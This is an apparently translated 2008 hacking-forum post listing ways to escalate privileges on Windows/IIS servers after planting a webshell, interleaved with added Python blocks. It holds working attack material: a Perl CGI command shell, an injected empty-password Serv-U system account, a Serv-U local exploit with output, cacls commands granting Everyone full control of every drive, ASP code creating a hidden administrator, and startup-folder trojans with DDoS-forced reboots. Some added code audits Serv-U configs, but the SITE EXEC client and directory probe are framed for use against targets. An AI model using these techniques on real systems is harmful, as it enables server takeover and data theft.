A collection of privilege-escalation tips from many masters

ID MYHACK58:62200819767
Type myhack58
Reporter Anonymous
Modified 2008-07-22T00:00:00


This article collects privilege-escalation tips from many experienced hackers.

Once we have a webshell, the next thing to do is elevate privileges.

My personal summary is as follows:

  1. C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere: check whether the webshell can browse into this directory. If it can, that is the best case: download the .CIF files stored directly under it, recover the pcAnywhere password from them, and log in with pcAnywhere.

  2. C:\WINNT\system32\config: this is where the SAM is kept, and c:\winnt\repair holds a backup copy. Crack the user passwords from the SAM with tools such as LC (L0phtCrack) or SAMInside.

  3. C:\Documents and Settings\All Users\Start Menu\Programs: check whether you can browse here. This directory yields a lot of useful information, because you can see many shortcuts. We usually pick the Serv-U shortcut, download it, view its properties locally to learn the install path, and then check whether we can browse there. Once inside, if we have permission to modify ServUDaemon.ini, add a user with an empty password:

  [USER=dede|1]
  Password=
  HomeDir=c:\
  TimeOut=600
  Maintenance=System
  Access1=C:\|RWAMELCDP
  Access2=d:\|RWAMELCDP
  Access3=f:\|RWAMELCDP
  SKEYValues=

  This user has the highest permissions (Maintenance=System). We can then connect over FTP and run "quote site exec xxx" to execute commands and elevate privileges.
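As an added example (not code from the original article or from Serv-U), the following Python audits a ServUDaemon.ini for exactly the kind of account added above: an empty password, Maintenance=System (the setting that permits SITE EXEC), and full RWAMELCDP rights on drive roots. The INI text embedded in it is constructed, and the stored password value only imitates Serv-U's format; the check itself is what a defender reviewing a Serv-U host would run, and what an attacker would use to spot an already-privileged account.

```python
"""Audit a ServUDaemon.ini for backdoor-style accounts.

Added example, not code from the original article or from Serv-U. It flags
the pattern the article shows: a user with an empty Password=,
Maintenance=System (which unlocks SITE EXEC), and full RWAMELCDP rights on
drive roots. SAMPLE_INI is constructed; the hash-like password is fake.
"""
import re

# Constructed sample: one legitimate user plus the article's injected one.
SAMPLE_INI = """\
[GLOBAL]
Version=5.2.0.0
ProcessID=1234

[USER=webadmin|1]
Password=ejADAD6A5C3F33BC1E9F44D6A17B1B4BA3
HomeDir=d:\\wwwroot
TimeOut=600
Access1=d:\\wwwroot|RWAMELCDP

[USER=dede|1]
Password=
HomeDir=c:\\
TimeOut=600
Maintenance=System
Access1=C:\\|RWAMELCDP
Access2=d:\\|RWAMELCDP
Access3=f:\\|RWAMELCDP
SKEYValues=
"""

ALL_RIGHTS = set("RWAMELCDP")
DRIVE_ROOT = re.compile(r"^[a-zA-Z]:\\?$")


def parse_users(ini_text):
    """Return {username: {key: value, ..., 'Access': [(path, flags), ...]}}.

    Hand-rolled rather than configparser: Serv-U puts '|' in section names
    and may put '%' in values, both of which trip configparser's defaults.
    """
    users = {}
    current = None
    for line in ini_text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = re.match(r"^\[USER=([^|\]]+)(?:\|\d+)?\]$", line)
        if m:
            current = users.setdefault(m.group(1), {"Access": []})
            continue
        if line.startswith("["):
            current = None          # some other section ([GLOBAL], [Domain1], ...)
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if re.match(r"^Access\d+$", key):
            path, _, flags = value.partition("|")
            current["Access"].append((path, flags))
        else:
            current[key] = value
    return users


def audit(users):
    """Return {username: [finding, ...]} for users with suspicious settings."""
    findings = {}
    for name, u in users.items():
        notes = []
        if u.get("Password", "x") == "":
            notes.append("empty password")
        if u.get("Maintenance", "None").lower() == "system":
            notes.append("Maintenance=System (SITE EXEC allowed)")
        for path, flags in u["Access"]:
            if DRIVE_ROOT.match(path) and set(flags.upper()) >= ALL_RIGHTS:
                notes.append(f"full rights on drive root {path}")
        if notes:
            findings[name] = notes
    return findings


if __name__ == "__main__":
    for user, notes in audit(parse_users(SAMPLE_INI)).items():
        print(f"{user}: " + "; ".join(notes))
```

Run it against a real ServUDaemon.ini by reading the file into `parse_users`; only the `dede` account in the sample is reported, the `webadmin` account is not.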

  4. c:\winnt\system32\inetsrv\data: this directory is likewise Everyone: Full Control. All we have to do is upload an elevation tool there and execute it.

  5. Check whether you can browse to c:\php (use phpspy) or c:\perl. The Perl directory is not always present; as before, download a shortcut and read its properties to find the path. Then use a CGI webshell such as the following:

#!/usr/bin/perl
# Minimal CGI command shell: runs whatever is passed in the query string
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;                         # undo URL encoding of spaces
s/%2f/\//ig;                        # and of slashes
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;

Save this as a .cgi file and execute it. If that does not work, try the .pl extension: rename the .cgi file to .pl and submit http://anyhost// . If the page displays "access denied", the script can execute. Immediately upload su.exe (the Serv-U elevation tool) to the Perl bin directory and submit http://anyhost//\perl\bin\su.exe, which returns:

Serv-u >3.x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

We are currently running as IUSR. Submit the following, one request per drive:

http://anyhost//\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
http://anyhost//\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
http://anyhost//\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
http://anyhost//\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"

If the tool returns output like the following, the exploit succeeded:

Serv-u >3.x Local Exploit by xiaolu

<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.

[+] Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
[+] Domain xl:2 Created
[+] Creating Evil User
<200-User=xl
 200 User settings saved
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
>PASS 111111
<230 User logged in, proceed.
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
<220 Domain deleted

Now every partition is Everyone: Full Control. Next we promote our own user to administrator:

http://anyhost//\perl\bin\su.exe "net localgroup administrators IUSR_anyhost /add"
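The exchange in the transcript above, and the "quote site exec xxx" step from tip 3, as an added example that is not part of the original article or of Serv-U. The client half uses only Python's standard ftplib and sends the same USER / PASS / SITE EXEC sequence that ftp.exe sends for "quote site exec". The server half is a constructed stand-in that replays the reply lines seen in the transcript and records, but never runs, the SITE EXEC argument; its "200" reply to SITE EXEC is an assumption, not a captured Serv-U response.

```python
"""The 'quote site exec' step as an FTP exchange, with both sides shown.

Added example, not code from the original article or from Serv-U. The
client is real ftplib usage; the server is a constructed stand-in that
replays the transcript's reply lines and records, but never executes,
the SITE EXEC argument. The 200 reply to SITE EXEC is assumed wording.
"""
import socket
import threading
from ftplib import FTP, error_perm

USER = "xl"          # the account created in the article's transcript
PASSWORD = "111111"


def _serve_one_session(listener, executed):
    """Speak just enough of RFC 959 for one login + SITE EXEC + QUIT."""
    conn, _ = listener.accept()
    conn.settimeout(5)
    reader = conn.makefile("rb")

    def reply(line):
        conn.sendall((line + "\r\n").encode())

    reply("220 Serv-U FTP Server v5.2 for WinSock ready...")
    pending_user, logged_in = None, False
    while True:
        raw = reader.readline()
        if not raw:                         # client closed the connection
            break
        verb, _, arg = raw.decode().rstrip("\r\n").partition(" ")
        verb = verb.upper()
        if verb == "USER":
            pending_user = arg
            reply("331 User name okay, need password.")
        elif verb == "PASS":
            logged_in = pending_user == USER and arg == PASSWORD
            reply("230 User logged in, proceed." if logged_in else "530 Not logged in.")
        elif verb == "SITE" and arg.upper().startswith("EXEC "):
            if not logged_in:
                reply("530 Not logged in.")
            else:
                executed.append(arg[5:])    # a real Maintenance=System account would run this
                reply("200 EXEC command successful.")   # assumed wording, not Serv-U's
        elif verb == "QUIT":
            reply("221 Goodbye.")
            break
        else:
            reply("500 Command not understood.")
    reader.close()
    conn.close()


def site_exec(host, port, user, password, command):
    """Log in and issue SITE EXEC <command>; return (login_reply, exec_reply)."""
    ftp = FTP()
    ftp.connect(host, port, timeout=5)
    try:
        login_reply = ftp.login(user, password)           # USER, then PASS
        exec_reply = ftp.sendcmd("SITE EXEC " + command)  # what 'quote site exec' sends
        ftp.quit()
        return login_reply, exec_reply
    finally:
        ftp.close()


def run_demo(command="cacls.exe c: /E /T /G everyone:F", password=PASSWORD):
    """Run the exchange against the stand-in server on a free local port."""
    listener = socket.socket()
    listener.settimeout(5)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    executed = []
    server = threading.Thread(target=_serve_one_session, args=(listener, executed), daemon=True)
    server.start()
    try:
        login_reply, exec_reply = site_exec("127.0.0.1", listener.getsockname()[1], USER, password, command)
        result = {"ok": True, "login": login_reply, "exec": exec_reply}
    except error_perm as exc:               # 5xx reply, e.g. wrong password
        result = {"ok": False, "error": str(exc)}
    finally:
        server.join(5)
        listener.close()
    result["executed"] = list(executed)
    return result


if __name__ == "__main__":
    print(run_demo())
```

Against a real target you would call `site_exec` with the Serv-U host and port and the account from ServUDaemon.ini; the stand-in exists only so the exchange can be seen end to end without a Serv-U install.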

  6. If you can successfully run "cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps", you can use it to elevate privileges. That command lists the ISAPI DLLs that run in-process, i.e. inside inetinfo.exe, which runs as SYSTEM: idq.dll, httpext.dll, httpodbc.dll, ssinc.dll and msw3prt.dll. Add asp.dll to this privileged list. asp.dll is located at c:\winnt\system32\inetsrv\asp.dll (the location is not necessarily the same on every system). Run:

  cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "c:\winnt\system32\inetsrv\asp.dll"

  Run "cscript adsutil.vbs get /W3SVC/InProcessIsapiApps" again to confirm that asp.dll was added to the list.

  7. You can also try the following ASP code to elevate, although it does not seem to work very often:

  <%@codepage=936%>
  <%
  Response.Expires=0
  On Error Resume Next
  Session.TimeOut=50
  Server.ScriptTimeout=3000
  Set lp=Server.CreateObject("WSCRIPT.NETWORK")
  oz="WinNT://"&lp.ComputerName
  Set ob=GetObject(oz)
  Set oe=GetObject(oz&"/Administrators,group")
  Set od=ob.Create("user","WekweN$")
  od.SetPassword "WekweN"          ' <----- password
  od.SetInfo
  Set of=GetObject(oz&"/WekweN$,user")
  oe.Add(of.ADsPath)
  Response.Write "WekweN$ super account created successfully!"
  %>

  Use this code to check whether the elevation succeeded:

  <%@codepage=936%>
  <%
  Response.Expires=0
  On Error Resume Next
  ' enumerate the members of the Administrators group
  Set tN=Server.CreateObject("Wscript.Network")
  Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
  For Each admin In objGroup.Members
    Response.Write admin.Name&"<br>"
  Next
  If Err Then
    Response.Write "Cannot create Wscript.Network"
  End If
  %>

  8. C:\Program Files\Java Web Start: if you can browse here, you can try a JSP webshell. I have heard that its permissions are generally very limited; I have not run into this case myself.

  9. Finally, if the host is locked down to an extreme degree, you can try writing a .bat, .vbs or similar Trojan into c:\Documents and Settings\All Users\Start Menu\Programs\Startup.

Then wait for the host to reboot, or force a reboot with your DDoS, so that the file runs and you achieve elevation.

To sum up: find a directory that is both writable and executable, whatever directory it is, upload your elevation tool there, and run it. Three words: "find", "upload", "execute".
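The "find" step above, as an added example that is not code from the original article: a Python probe that tests each candidate directory by actually listing it and creating a file in it, rather than trusting os.access(), which on Windows does not reflect the effective ACL. ARTICLE_CANDIDATES is the article's own path list for a real run from the target; demo() instead builds throwaway directories so the logic can be exercised on any machine.

```python
"""Probe candidate directories for listing and write access.

Added example, not from the original article. probe_dir() tries the
operations for real; demo() sets up constructed directories (one writable,
one made read-only, one missing) so the check can run anywhere.
"""
import os
import tempfile
import uuid

# The article's candidate list (Windows 2000-era paths), for a real run on the target.
ARTICLE_CANDIDATES = [
    r"C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere",
    r"C:\WINNT\system32\config",
    r"C:\Documents and Settings\All Users\Start Menu\Programs",
    r"c:\winnt\system32\inetsrv\data",
    r"c:\php",
    r"c:\perl",
    r"C:\Program Files\Java Web Start",
    r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup",
]


def probe_dir(path):
    """Return {'path', 'exists', 'listable', 'writable'} by attempting each operation."""
    result = {"path": path, "exists": os.path.isdir(path), "listable": False, "writable": False}
    if not result["exists"]:
        return result
    try:
        os.listdir(path)
        result["listable"] = True
    except OSError:
        pass
    probe = os.path.join(path, f".probe-{uuid.uuid4().hex}")   # random name avoids clobbering
    try:
        with open(probe, "x") as fh:
            fh.write("probe")
        result["writable"] = True
    except OSError:
        pass
    finally:
        try:
            os.remove(probe)          # leave nothing behind
        except OSError:
            pass
    return result


def probe_all(paths):
    """Probe every candidate and return only the ones we could write to."""
    return [r for r in map(probe_dir, paths) if r["writable"]]


def demo():
    """Constructed demo: a writable dir, a read-only dir (POSIX mode 555; root
    ignores this), and a missing dir. Returns {name: probe result}."""
    base = tempfile.mkdtemp()
    writable = os.path.join(base, "inetsrv_data")
    readonly = os.path.join(base, "system32_config")
    missing = os.path.join(base, "does_not_exist")
    os.mkdir(writable)
    os.mkdir(readonly)
    os.chmod(readonly, 0o555)
    try:
        return {os.path.basename(p): probe_dir(p) for p in (writable, readonly, missing)}
    finally:
        os.chmod(readonly, 0o755)
        os.rmdir(readonly)
        os.rmdir(writable)
        os.rmdir(base)


if __name__ == "__main__":
    for name, r in demo().items():
        print(f"{name}: exists={r['exists']} listable={r['listable']} writable={r['writable']}")
```

On the target, `probe_all(ARTICLE_CANDIDATES)` gives the list of places the upload step can use; the "execute" step still depends on what the web server or a scheduled process will run from each of them.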

The above is just my humble opinion; if you have good methods, please share them.